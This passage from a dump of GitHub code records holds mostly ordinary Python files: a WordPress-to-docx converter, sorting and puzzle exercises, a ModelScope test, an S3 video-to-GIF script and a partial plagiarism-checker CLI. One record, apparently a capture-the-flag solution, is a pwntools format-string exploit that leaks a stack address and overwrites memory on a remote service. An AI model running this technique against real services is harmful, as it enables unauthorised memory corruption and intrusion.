channel_data)\n return channel_data\n\n @staticmethod\n def __get_channel_name(name, bitrate, is_hd, lang_code):\n color = 'yellow'\n\n kbps = bitrate.split(' ')[0]\n\n if not kbps.isdigit():\n color = 'silver'\n elif int(kbps) >= 2000:\n color = 'lime'\n elif int(kbps) < 1000:\n color = 'red'\n\n return '%s %s [COLOR %s]%s(%s)[/COLOR]' % (name, lang_code, color, '[B](HD)[/B] ' if is_hd else '', bitrate)\n","repo_name":"Makintos/plugin.video.acestream.sports","sub_path":"lib/livefootballol.py","file_name":"livefootballol.py","file_ext":"py","file_size_in_byte":14963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"18472402260","text":"from pwn import *\ncontext.log_level = 'DEBUG'\n\ndef p64(n):\n return pack(n, 64, 'little')\n\n# p = process('./secret')\n# gdb.attach(p, gdbscript=('b *0x0000000000400801\\n'))\np = remote('140.110.112.221', 6131)\npayload = b'%10$p' # leak_stack_address\np.recvuntil(b':')\n# buffer locate on offset 8\np.sendline(payload)\nstack_address = int(p.recvuntil(b'\\n').strip(b'\\n').split(b' ')[3].decode(),16)\nstack_address = stack_address - 0x100 + 12\nprint(hex(stack_address))\np.recvuntil(b')')\n# p.sendline(b'N')\n# p.recvuntil(b':')\npayload = b'%%55c%10$hhn' + b'B'*5 + p64(stack_address) # modify stack value b'%55c%10$hhn' + b'B'*5\np.sendline(payload)\n#p.recvuntil(b')')\np.interactive()\n","repo_name":"Stanley137/CyberSecurity_Camp","sub_path":"mythirdpwn_ctf/secret_poc.py","file_name":"secret_poc.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"22910229755","text":"import xml.etree.ElementTree as ET\nfrom html.parser import HTMLParser\nfrom docx import Document\nimport datetime\nimport string\nimport requests\nimport pathlib\nimport shutil\nfrom docx.shared import Inches\n\nclass MyHTMLParser(HTMLParser):\n \n def __init__(self, _lastTitle, _lastDate):\n self.doc = Document()\n self.doc.add_heading(_lastTitle, 0)\n self.doc.add_heading(_lastDate, level=1)\n self.imageCounter = 0\n self.imageStack = []\n self.treeStack = []\n super().__init__()\n\n def handle_starttag(self, tag, attrs):\n print(f\"Encountered a start tag:{tag} , {attrs}\")\n if (tag == 'img'):\n for attr in attrs:\n if attr[0] == 'src':\n print(attr[1])\n self.imageCounter = self.imageCounter + 1\n extention = pathlib.Path(attr[1]).suffix\n fileName = './exports/' + str(self.imageCounter) + extention\n print(fileName)\n url = attr[1]\n response = requests.get(url, stream=True)\n with open(fileName, 'wb') as out_file:\n shutil.copyfileobj(response.raw, out_file)\n del response\n #with open(fileName, 'wb') as f:\n # f.write(requests.get(attr[1]).content)\n self.imageStack.append(fileName)\n self.treeStack.append(tag)\n pass\n\n def handle_endtag(self, tag):\n print(\"Encountered an end tag :\", tag)\n tagtype = self.treeStack.pop()\n pass\n\n def handle_data(self, data):\n strippedString = data.translate(str.maketrans('', '', string.whitespace))\n print(f\"Encountered some data :{len(data)}{len(strippedString)}{data}\")\n if (len(strippedString) > 0):\n if (len(self.treeStack)>0):\n tagtype = self.treeStack[len(self.treeStack)-1]\n if (tagtype == 'p'):\n if (len(self.treeStack) > 1):\n innertagtype = self.treeStack[len(self.treeStack)-2]\n if innertagtype == 'blockquote':\n textToWrite = '\\\"' + data + '\\\"'\n self.doc.add_paragraph(textToWrite)\n else:\n self.doc.add_paragraph(data)\n if (tagtype == 'h1'):\n self.doc.add_heading(data, level=1)\n if (tagtype == 'h2'):\n self.doc.add_heading(data, level=2)\n if (tagtype == 'h3'):\n self.doc.add_heading(data, level=3)\n if (tagtype == 'div'):\n #self.doc.add_paragraph(data)\n innertagtype = self.treeStack[len(self.treeStack)-2]\n if (innertagtype == 'figure'):\n self.doc.add_paragraph(data)\n if (tagtype == 'a'):\n #self.doc.add_paragraph(data)\n innertagtype = self.treeStack[len(self.treeStack)-2]\n if (innertagtype == 'p'):\n self.doc.add_paragraph(data)\n if (tagtype == 'li'):\n #self.doc.add_paragraph(data)\n innertagtype = self.treeStack[len(self.treeStack)-2]\n if (innertagtype == 'ul'):\n self.doc.add_paragraph(data, style='List Bullet')\n if (tagtype == 'img'):\n fileName = self.imageStack[len(self.treeStack)-1]\n print(f\"write {fileName} to the doc\")\n self.doc.add_picture(fileName, width=Inches(1.25))\n else:\n self.doc.add_paragraph(data)\n else:\n if (len(self.imageStack)>0):\n fileName = self.imageStack.pop()\n print(f\"write {fileName} to the doc\")\n self.doc.add_picture(fileName, width=Inches(1.25))\n \n def write_document(self, title):\n self.doc.save('./exports/'+title+'.docx')\n\ntree = ET.parse('researchandideasdiary.WordPress.2019-07-15.xml')\nroot = tree.getroot()\nprint(root.tag)\nprint(root.items())\nchannel = root.getchildren()[0]\nlistOfTags = []\nfor child in channel.getchildren():\n print(child.tag, child.attrib)\n if child.tag == 'item':\n lastTitle = ''\n lastDate = ''\n lastGuid = ''\n for postdata in child.getchildren():\n listOfTags.append(postdata.tag)\n if (postdata.tag == 'title'):\n print(postdata.text)\n lastTitle = postdata.text\n if (postdata.tag == 'pubDate'):\n 
print(postdata.text)\n lastDate = postdata.text\n if (postdata.tag == 'guid'):\n print(postdata.text)\n lastGuid = postdata.text\n if postdata.tag == '{http://purl.org/rss/1.0/modules/content/}encoded':\n datestring = 'draft'\n if (lastDate != 'Mon, 30 Nov -0001 00:00:00 +0000'):\n date_time_obj = datetime.datetime.strptime(lastDate, '%a, %d %b %Y %H:%M:%S %z')\n datestring = str(date_time_obj.date())\n print(datestring)\n parser = MyHTMLParser(lastTitle, datestring)\n parser.feed(str(postdata.text))\n parser.write_document('Exp'+datestring+lastTitle)\n\nlistOfUniqueTags = list(set(listOfTags))\nfor tag in listOfUniqueTags:\n print(tag)\n\n ","repo_name":"JapieGreeff/WordPressToDocx","sub_path":"wordpressInDocxOut.py","file_name":"wordpressInDocxOut.py","file_ext":"py","file_size_in_byte":5522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70121702408","text":"# -*- coding: utf-8 -*-\r\n'''\r\n1. В диапазоне натуральных чисел от 2 до 99 определить, сколько из них кратны\r\nкаждому из чисел в диапазоне от 2 до 9.\r\n'''\r\n\r\nstart_range = 2\r\nend_range = 100\r\n\r\nmultiples_min = 2\r\nmultiples_max = 9 + 1\r\n\r\nfor i in range(multiples_min, multiples_max):\r\n count = 0\r\n for itm in range(start_range, end_range):\r\n if (itm % i) == 0:\r\n count += 1\r\n print(f'Числу {i} в диапазоне от {start_range} до {end_range-1} кратны {count} чисел')","repo_name":"darksoul985/Algorithms","sub_path":"lesson_3_task_1.py","file_name":"lesson_3_task_1.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"22865427718","text":"import os.path as osp\nimport unittest\n\nimport cv2\n\nfrom modelscope.hub.snapshot_download import snapshot_download\nfrom modelscope.outputs import OutputKeys\nfrom modelscope.pipelines import pipeline\nfrom modelscope.pipelines.base import Pipeline\nfrom modelscope.utils.constant import Tasks\nfrom modelscope.utils.test_utils import test_level\n\n\nclass SkinRetouchingTest(unittest.TestCase):\n\n def setUp(self) -> None:\n self.task = Tasks.skin_retouching\n self.model_id = 'damo/cv_unet_skin-retouching'\n self.test_image = 'data/test/images/skin_retouching.png'\n\n def pipeline_inference(self, pipeline: Pipeline, input_location: str):\n result = pipeline(input_location)\n cv2.imwrite('result_skinretouching.png', result[OutputKeys.OUTPUT_IMG])\n print(f'Output written to {osp.abspath(\"result_skinretouching.png\")}')\n\n @unittest.skipUnless(test_level() >= 2, 'skip test in current test level')\n def test_run_by_direct_model_download(self):\n model_dir = snapshot_download(self.model_id)\n skin_retouching = pipeline(Tasks.skin_retouching, model=model_dir)\n self.pipeline_inference(skin_retouching, self.test_image)\n\n @unittest.skipUnless(test_level() >= 0, 'skip test in current test level')\n def test_run_modelhub(self):\n skin_retouching = pipeline(Tasks.skin_retouching, model=self.model_id)\n self.pipeline_inference(skin_retouching, self.test_image)\n\n @unittest.skipUnless(test_level() >= 2, 'skip test in current test level')\n def test_run_modelhub_default_model(self):\n skin_retouching = pipeline(Tasks.skin_retouching)\n self.pipeline_inference(skin_retouching, self.test_image)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"modelscope/modelscope","sub_path":"tests/pipelines/test_skin_retouching.py","file_name":"test_skin_retouching.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"}
+{"seq_id":"73386389129","text":"import cv2\nimport os\nimport re\nimport tempfile\nimport numpy as np\nfrom datetime import date\nfrom PIL import Image\nimport boto3\nimport json\n\nfrom dotenv import load_dotenv, find_dotenv\n\n_ = load_dotenv(find_dotenv())\n\nAWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']\nAWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\n\n\ndef get_video(awssession, today):\n # Download from s3\n s3 = awssession.resource('s3')\n s3_client = awssession.client('s3')\n\n filenames = [\n my_bucket_object.key\n for my_bucket_object in s3.Bucket('bageld-inputs').objects.all()\n ]\n\n videoFile = list(filter(lambda x: today in x, filenames))[0]\n\n player_name = videoFile.split(';')[1].replace('_', ' ')\n tour = videoFile.split(';')[2]\n s3_client.download_file('bageld-inputs', videoFile, videoFile[videoFile.find(';')+1:])\n\n return videoFile[videoFile.find(';')+1:], player_name, tour\n\n\ndef upload_game_params(awssession, player_name, tour):\n s3 = awssession.resource('s3')\n\n params_json = json.dumps(\n {\n 'answerHash': hashAnswer(player_name.upper()),\n 'tour': tour\n }, indent=4)\n\n s3.Bucket('bageld-inputs').put_object(Key='bageld_params.json',\n Body=params_json)\n\n\ndef gen_folders():\n temp_dir = tempfile.TemporaryDirectory()\n\n frames_path = os.path.join(temp_dir.name, \"frames\")\n dilate_path = os.path.join(temp_dir.name,\n \"diff_gray_dilate_frames\") # image 0\n gray_path = os.path.join(temp_dir.name, \"diff_gray_frames\") # image 1\n diff_path = os.path.join(temp_dir.name, \"diff_frames\") # image 2\n\n today = date.today()\n output_path = os.path.join(temp_dir.name, str(today))\n\n os.mkdir(frames_path)\n os.mkdir(dilate_path)\n os.mkdir(gray_path)\n os.mkdir(diff_path)\n os.mkdir(output_path)\n\n return temp_dir, [\n frames_path, dilate_path, gray_path, diff_path, output_path\n ]\n\n\ndef load_video(videoFile, filepath):\n count = 0\n\n cap = cv2.VideoCapture(videoFile) # capturing the video from the given path\n frameRate = cap.get(5) #frame rate - want to bump it up\n x = 1\n\n first_iter = True\n\n while (cap.isOpened()):\n frameId = cap.get(1) #current frame number\n ret, frame = cap.read()\n if (ret != True):\n break\n else:\n filename = f\"{filepath}/frames/frame{str(count).rjust(3, '0')}.jpg\"\n count += 1\n cv2.imwrite(filename, frame)\n # Get average frames\n if first_iter:\n avg = np.float32(frame)\n first_iter = False\n cv2.accumulateWeighted(frame, avg, 0.005)\n background_image = cv2.convertScaleAbs(avg)\n cap.release()\n return background_image\n\n\ndef load_frames(filepath='frames/'):\n col_frames = os.listdir(filepath)\n\n # sort file names\n col_frames.sort(key=lambda f: int(re.sub('\\D', '', f)))\n\n # empty list to store the frames\n col_images = []\n\n for i in col_frames:\n # read the frames\n img = cv2.imread(os.path.join(filepath, i))\n # append the frames to the list\n col_images.append(img)\n\n return col_images\n\n\ndef gen_dilated_frames(col_images, background_image, filepath):\n kernel = np.ones((4, 4), np.uint8)\n\n for i in range(len(col_images) - 1):\n\n # frame differencing\n\n diff_image = cv2.absdiff(cv2.cvtColor(col_images[i], cv2.COLOR_BGR2RGB),\n cv2.cvtColor(background_image, cv2.COLOR_BGR2RGB))\n gray_diff = cv2.cvtColor(diff_image, cv2.COLOR_BGR2GRAY)\n\n # image thresholding\n ret, thresh = cv2.threshold(gray_diff, 30, 255, cv2.THRESH_BINARY)\n\n # image dilation\n dilated = cv2.dilate(thresh, kernel, iterations=1)\n\n cv2.imwrite(os.path.join(filepath, str(i).rjust(3, '0') + '.png'), 
dilated)\n\n\ndef gen_gray_frames(col_images, background_image, filepath):\n\n for i in range(len(col_images) - 1):\n\n # frame differencing\n\n diff_image = cv2.absdiff(cv2.cvtColor(col_images[i], cv2.COLOR_BGR2RGB),\n cv2.cvtColor(background_image, cv2.COLOR_BGR2RGB))\n gray_diff = cv2.cvtColor(diff_image, cv2.COLOR_BGR2GRAY)\n\n # image thresholding\n ret, thresh = cv2.threshold(gray_diff, 30, 255, cv2.THRESH_BINARY)\n\n cv2.imwrite(os.path.join(filepath, str(i).rjust(3, '0') + '.png'), thresh)\n\n\ndef gen_diff_frames(col_images, background_image, filepath):\n\n for i in range(len(col_images) - 1):\n\n # frame differencing\n\n diff_image = cv2.absdiff(cv2.cvtColor(col_images[i], cv2.COLOR_BGR2RGB),\n cv2.cvtColor(background_image, cv2.COLOR_BGR2RGB))\n\n cv2.imwrite(os.path.join(filepath,\n str(i).rjust(3, '0') + '.png'), diff_image)\n\n\ndef write_video(output_file, input_path, fps=60):\n\n frame_array = []\n file_list = [f for f in os.listdir(input_path)]\n\n file_list.sort(key=lambda f: int(re.sub('\\D', '', f)))\n\n for i in range(len(file_list)):\n filename = os.path.join(input_path, file_list[i])\n\n #read frames\n img = cv2.imread(filename)\n try:\n height, width, layers = img.shape\n size = (width, height)\n except:\n pass\n\n #inserting the frames into an image array\n frame_array.append(img)\n\n out = cv2.VideoWriter(output_file, cv2.VideoWriter_fourcc(*'DIVX'), fps,\n size)\n\n for i in range(len(frame_array)):\n # writing to a image array\n out.write(frame_array[i])\n\n out.release()\n\n\ndef write_gif(output_file, input_path):\n frame_array = []\n file_list = [f for f in os.listdir(input_path)]\n file_list.sort(key=lambda f: int(re.sub('\\D', '', f)))\n\n for i in range(0, len(file_list), 4):\n filename = os.path.join(input_path, file_list[i])\n img = Image.open(filename)\n frame_array.append(img)\n\n frame_array[0].save(output_file,\n format='GIF',\n append_images=frame_array[1:],\n save_all=True,\n duration=0,\n loop=0)\n\n\ndef hashAnswer(inputString):\n hash_value = 1\n if len(inputString) == 0:\n return hash_value\n for x in range(len(inputString)):\n ch = ord(inputString[x])\n hash_value = (hash_value * ch) % 100000000 + 1\n return hash_value\n\n\ndef main(cleanup_temp=True):\n today = str(date.today()).replace('-', '')\n\n session = boto3.Session(aws_access_key_id=AWS_ACCESS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\n s3_client = session.client('s3')\n\n videoFile, player_name, tour = get_video(awssession=session, today=today)\n upload_game_params(awssession=session, player_name=player_name, tour=tour)\n\n temp_dir, output_dirs = gen_folders()\n background = load_video(videoFile, temp_dir.name)\n col_images = load_frames(output_dirs[0])\n\n gen_dilated_frames(col_images, background, output_dirs[1])\n write_gif(\"mystery_0.gif\", output_dirs[1])\n\n gen_gray_frames(col_images, background, output_dirs[2])\n write_gif(\"mystery_1.gif\", output_dirs[2])\n\n gen_diff_frames(col_images, background, output_dirs[3])\n write_gif(\"mystery_2.gif\", output_dirs[3])\n\n write_gif(\"mystery_3.gif\", output_dirs[0])\n\n for i in range(4):\n s3_client.upload_file(f'mystery_{i}.gif', 'bagelio-files',\n f'gifs/mystery_{i}.gif')\n\n # need new function to update the database of old games, and delete yesterday's raw video to save s3 space\n\n if cleanup_temp:\n temp_dir.cleanup()\n else:\n return temp_dir\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"liufran1/bageledio","sub_path":"clean_files.py","file_name":"clean_files.py","file_ext":"py","file_size_in_byte":7319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"9845972971","text":"import time\na = []\n\nfor x in range(100):\n with open(\"input.txt\",\"r\") as f:\n r = f.readlines()\n for i in r: \n row = i.split(\" \")\n a += [int(j) for j in row if j !=\"\"]\n\n# with open(\"input.txt\",\"r\") as f:\n# r = f.readlines()\n# for i in r: \n# row = i.split(\" \")\n# a += [int(j) for j in row if j]\n\n\n\n\nMIN_MERGE = 32\ndef calcMinRun(n):\n r = 0\n while n >= MIN_MERGE:\n r |= n & 1\n n >>= 1\n return n + r\n\ndef insertionSort(a, s, d):\n for i in range(s + 1, d + 1):\n j = i\n while j > s and a[j] < a[j - 1]:\n a[j], a[j - 1] = a[j - 1], a[j]\n j -= 1\n \ndef merge(a, l, m, r):\n \n len1, len2 = m - l + 1, r - m\n left, right = [], []\n for i in range(0, len1):\n left.append(a[l + i])\n for i in range(0, len2):\n right.append(a[m + 1 + i])\n \n i, j, k = 0, 0, l\n while i < len1 and j < len2:\n if left[i] <= right[j]:\n a[k] = left[i]\n i += 1\n else:\n a[k] = right[j]\n j += 1\n k += 1\n \n while i < len1:\n a[k] = left[i]\n k += 1\n i += 1\n while j < len2:\n a[k] = right[j]\n k += 1\n j += 1\n \ndef timSort(a):\n n = len(a)\n minRun = calcMinRun(n)\n \n for start in range(0, n, minRun):\n end = min(start + minRun - 1, n - 1)\n insertionSort(a, start, end)\n \n size = minRun\n while size < n:\n \n \n for left in range(0, n, 2 * size):\n \n mid = min(n - 1, left + size - 1)\n right = min((left + 2 * size - 1), (n - 1))\n \n if mid < right:\n merge(a, left, mid, right)\n \n size = 2 * size\n\nstartTime = time.time()\ntimSort(a)\nendTime = time.time()\n\n\nprint(\"Tim sort when n=\",len(a))\nprint(\"Durata executie algoritm:\",endTime-startTime,\" secunde\")","repo_name":"poenaruiulian/sorting_algorithms","sub_path":"8_tim_sort.py","file_name":"8_tim_sort.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"43428785895","text":"import sys\nimport math\nimport heapq\nfrom collections import deque\nfp = open('gold_mine_chapter_1_input.txt', 'r')\ntnum = int(fp.readline())\ncase = 1\nf = open(\"c1out.txt\", \"w\")\n\nwhile tnum > 0:\n n = int(fp.readline())\n C = fp.readline().split() \n C = [int(ci) for ci in C]\n max_ans = float('-inf')\n adj = [[] for i in range(n)]\n f.write(\"Case #\"+str(case)+\": \")\n for i in range(n-1):\n ab = fp.readline().split()\n a, b = int(ab[0])-1, int(ab[1])-1\n adj[a].append(b)\n adj[b].append(a)\n \n pathsum = [ 0 for i in range(n)]\n pathsum[0] = C[0]\n L = [ 0 for i in range(n)]\n P = [0 for i in range(n)]\n T = [0 for i in range(n)]\n L[0] = 0\n P[0] = -1\n T[0] = 0\n q = deque([(0, -1, 0)])\n H = 0\n while q:\n node, parent, level = q[0]\n q.popleft()\n for x in adj[node]:\n if x == parent:\n continue\n L[x] = level + 1\n P[x] = node\n pathsum[x] = pathsum[node] + C[x]\n q.append((x, node, level+1)) \n H = max(H, level+1) \n\n if H == 0:\n f.write(str(C[0])+\"\\n\")\n tnum -= 1\n case += 1\n continue\n \n nr = int(math.sqrt(H*1.0)) \n #print nr\n\n def dfs(root, node, parent, nr):\n if L[node] < nr:\n T[node] = root\n elif L[node]%nr == 0:\n T[node] = P[node] \n else:\n T[node] = T[P[node]]\n for x in adj[node]:\n if x == parent:\n continue\n dfs(root, x, node, nr)\n\n def LCA(x, y):\n while T[x] != T[y]:\n if L[x] > L[y]:\n x = T[x] \n else: \n y = T[y]\n while x!= y:\n if L[x] > L[y]:\n x = P[x]\n else:\n y = P[y]\n return x \n\n dfs(0, 0,-1, nr)\n for x in adj[0]:\n max_ans = max(max_ans, pathsum[x])\n for i in range(1, n):\n for j in range(1, n):\n if i == j:\n continue\n if i in adj[j]:\n continue\n if LCA(i, j) == 0:\n max_ans = max(max_ans, pathsum[i] + pathsum[j] - C[0])\n \n for i in range(1, n):\n if i not in adj[0]:\n max_ans = max(max_ans, pathsum[i]) \n \n f.write(str(max_ans)+\"\\n\")\n tnum -= 1\n case += 1\nf.close()\n\n","repo_name":"Shadek07/facebook-hacker-cup","sub_path":"2021/Qualification Round/Goldmine_C1/c1.py","file_name":"c1.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"10585986687","text":"import random as r\n\nguess = ['石头', '剪刀', '布', '石头']\nplayer = input(f'{guess[0:3]}:')\nwhile player != 'Q':\n try:\n if player not in guess:\n raise\n CPU = r.choice(guess[0:3])\n print(f'CPU:{CPU}')\n if player == CPU:\n print('Draw!')\n elif guess[guess.index(player) + 1] == CPU:\n print('Player Win!')\n else:\n print('CPU win!')\n player = input(f'{guess[0:3]}:')\n except:\n player = input(f'输入有误!{guess[0:3]}:')\n","repo_name":"JMbaozi/absorb","sub_path":"program/猜拳.py","file_name":"猜拳.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"}
+{"seq_id":"10774566449","text":"'''\n문제 설명\n양의 정수 n이 매개변수로 주어질 때, n이 홀수라면 n 이하의 홀수인 모든 양의 정수의 합을 return 하고 n이 짝수라면 n 이하의 짝수인 모든 양의 정수의 제곱의 합을 return 하는 solution 함수를 작성해 주세요.\n\n입출력 예\nn\tresult\n7\t16\n10\t220\n'''\n\ndef solution(n):\n answer = 0\n if n%2 == 1: # oddoreven = \"odd\" if n%2 == 1 else \"even\" 변수 정의해 홀짝 판단 if oddoreven == \"odd\": \n for i in range(1, n+1, 2):\n answer += i\n else:\n for i in range(2, n+1, 2):\n answer += i*i\n return answer\n\n\n\n# 다른 사람 풀이\ndef solution(n):\n if n%2: # n%2 == 1 즉, 홀수 일때 실행\n return sum(range(1,n+1,2))\n return sum([i*i for i in range(2,n+1,2)])\n\n","repo_name":"etesongg/CodingTest-Practice","sub_path":"programmers/Lv. 0/9-4주/홀짝에 따라 다른 값 반환.py","file_name":"홀짝에 따라 다른 값 반환.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2943193565","text":"import speech_recognition as sr\nrecog = sr.Recognizer()\nmic = sr.Microphone()\n\ndef sysListen():\n with mic as source:\n recog.adjust_for_ambient_noise(source)\n audio = recog.listen(source)\n \n # setup response\n response = {\n \"success\" : True,\n \"error\" : None,\n \"transcription\" : None\n }\n\n # use Google API\n try:\n response[\"transcription\"] = recog.recognize_google(audio)\n except sr.RequestError:\n # API was unreachable or unresponsive\n response[\"success\"] = False\n response[\"error\"] = \"API unavailable\"\n except sr.UnknownValueError:\n # speech was unintelligible\n response[\"error\"] = \"Unable to recognize speech\"\n\n return response[\"transcription\"]\n\n","repo_name":"Siddhant-Ray/SlideEZ","sub_path":"appUtils.py","file_name":"appUtils.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"28918250610","text":"\"\"\"\nThis module consist the CLI of the codeplag util and\nnecessary internal classes for it.\n\"\"\"\nimport argparse\nfrom pathlib import Path\nfrom typing import List, Optional\n\nfrom webparsers.types import GitHubContentUrl\n\nfrom codeplag.consts import (\n DEFAULT_GENERAL_REPORT_NAME,\n EXTENSION_CHOICE,\n LANGUAGE_CHOICE,\n MODE_CHOICE,\n REPORTS_EXTENSION_CHOICE,\n UTIL_NAME,\n UTIL_VERSION,\n)\n\n\nclass CheckUniqueStore(argparse.Action):\n \"\"\"Checks that the list of arguments contains no duplicates, then stores\"\"\"\n\n def __call__(\n self,\n _parser: argparse.ArgumentParser,\n namespace: argparse.Namespace,\n values: List[str],\n _option_string: Optional[str] = None,\n ):\n if len(values) > len(set(values)):\n raise argparse.ArgumentError(\n self,\n \"You cannot specify the same value multiple times. \"\n f\"You provided {values}\",\n )\n setattr(namespace, self.dest, values)\n\n\nclass DirPath(Path):\n \"\"\"Path that raising argparse.ArgumentTypeError when parsing CLI\n arguments if directory is not exists.\n \"\"\"\n\n def __new__(cls, *args, **kwargs):\n path = Path(*args, **kwargs)\n if not path.is_dir():\n raise argparse.ArgumentTypeError(\n f\"Directory '{path}' not found or not a directory.\"\n )\n\n return Path.__new__(Path, *args, **kwargs)\n\n\nclass FilePath(Path):\n \"\"\"Path that raising argparse.ArgumentTypeError when parsing CLI\n arguments if file is not exists.\n \"\"\"\n\n def __new__(cls, *args, **kwargs):\n path = Path(*args, **kwargs)\n if not path.is_file():\n raise argparse.ArgumentTypeError(f\"File '{path}' not found or not a file.\")\n\n return Path.__new__(Path, *args, **kwargs)\n\n\nclass CodeplagCLI(argparse.ArgumentParser):\n \"\"\"The argument parser of the codeplag util.\"\"\"\n\n def __add_settings_path(self, subparsers: argparse._SubParsersAction) -> None:\n settings = subparsers.add_parser(\n \"settings\",\n help=f\"Modifies and shows static settings of the '{UTIL_NAME}' util.\",\n )\n\n settings_commands = settings.add_subparsers(\n help=f\"Settings commands of the '{UTIL_NAME}' util.\",\n required=True,\n metavar=\"COMMAND\",\n dest=\"settings\",\n )\n\n # settings modify\n settings_modify = settings_commands.add_parser(\n \"modify\",\n help=f\"Manage the '{UTIL_NAME}' util settings.\",\n )\n settings_modify.add_argument(\n \"-env\",\n \"--environment\",\n help=\"Path to the environment file with GitHub access token.\",\n type=FilePath,\n )\n settings_modify.add_argument(\n \"-r\",\n \"--reports\",\n help=\"If defined, then saves reports about suspect works \"\n \"into provided path.\",\n metavar=\"DIRECTORY\",\n type=DirPath,\n )\n settings_modify.add_argument(\n \"-re\",\n \"--reports_extension\",\n help=\"Extension of saved report files.\",\n type=str,\n choices=REPORTS_EXTENSION_CHOICE,\n )\n settings_modify.add_argument(\n \"-sp\",\n \"--show_progress\",\n help=\"Show progress of searching plagiarism.\",\n type=int,\n choices=[0, 1],\n )\n settings_modify.add_argument(\n \"-t\",\n \"--threshold\",\n help=\"Threshold of analyzer which classifies two work as same. \"\n \"If this number is too large, such as 99, \"\n \"then completely matching jobs will be found. 
\"\n \"Otherwise, if this number is small, such as 50, \"\n \"then all work with minimal similarity will be found.\",\n type=int,\n choices=range(50, 100),\n metavar=\"{50, 51, ..., 99}\",\n )\n settings_modify.add_argument(\n \"-l\",\n \"--language\",\n help=\"The language of help messages, generated reports, errors.\",\n type=str,\n choices=LANGUAGE_CHOICE,\n )\n\n # settings show\n settings_commands.add_parser(\n \"show\",\n help=f\"Show the '{UTIL_NAME}' util settings.\",\n )\n\n def __add_check_path(self, subparsers: argparse._SubParsersAction) -> None:\n check = subparsers.add_parser(\"check\", help=\"Start searching similar works.\")\n check.add_argument(\n \"-d\",\n \"--directories\",\n metavar=\"DIRECTORY\",\n type=DirPath,\n help=\"Absolute or relative path to a local directories with project files.\",\n nargs=\"+\",\n action=CheckUniqueStore,\n default=[],\n )\n check.add_argument(\n \"-f\",\n \"--files\",\n metavar=\"FILE\",\n type=FilePath,\n help=\"Absolute or relative path to files on a computer.\",\n nargs=\"+\",\n action=CheckUniqueStore,\n default=[],\n )\n check.add_argument(\n \"--mode\",\n help=\"Choose one of the following modes of searching plagiarism. \"\n \"The 'many_to_many' mode may require more free memory.\",\n type=str,\n choices=MODE_CHOICE,\n default=\"many_to_many\",\n )\n check.add_argument(\n \"-pe\",\n \"--path-regexp\",\n # TODO: Check that it used with listed below options\n help=\"A regular expression for filtering checked works by name. \"\n \"Used with options 'directories', 'github-user' and 'github-project-folders'.\",\n type=str,\n )\n\n check_required = check.add_argument_group(\"required options\")\n check_required.add_argument(\n \"-ext\",\n \"--extension\",\n help=\"Extension responsible for the analyzed programming language.\",\n type=str,\n choices=EXTENSION_CHOICE,\n required=True,\n )\n\n check_github = check.add_argument_group(\"GitHub options\")\n check_github.add_argument(\n \"-ab\",\n \"--all-branches\",\n help=\"Searching in all branches.\",\n action=\"store_true\",\n )\n check_github.add_argument(\n \"-re\",\n \"--repo-regexp\",\n type=str,\n help=\"A regular expression to filter searching repositories on GitHub.\",\n )\n check_github.add_argument(\n \"-gf\",\n \"--github-files\",\n metavar=\"GITHUB_FILE\",\n type=GitHubContentUrl,\n help=\"URL to file in a GitHub repository.\",\n nargs=\"+\",\n action=CheckUniqueStore,\n default=[],\n )\n check_github.add_argument(\n \"-gu\", \"--github-user\", type=str, help=\"GitHub organisation/user name.\"\n )\n check_github.add_argument(\n \"-gp\",\n \"--github-project-folders\",\n metavar=\"GITHUB_PROJECT_FOLDER\",\n type=GitHubContentUrl,\n help=\"URL to a GitHub project folder.\",\n nargs=\"+\",\n action=CheckUniqueStore,\n default=[],\n )\n\n def __add_report_path(self, subparsers: argparse._SubParsersAction) -> None:\n report = subparsers.add_parser(\n \"report\",\n help=f\"Handling generated by the {UTIL_NAME} reports as creating html \"\n \"report file or show it on console.\",\n )\n\n report_commands = report.add_subparsers(\n help=f\"Report commands of the '{UTIL_NAME}' util.\",\n required=True,\n metavar=\"COMMAND\",\n dest=\"report\",\n )\n\n # report create\n report_create = report_commands.add_parser(\n \"create\",\n help=\"Generate general report from created some time ago report files.\",\n )\n report_create.add_argument(\n \"-p\",\n \"--path\",\n help=\"Path to save generated general report. 
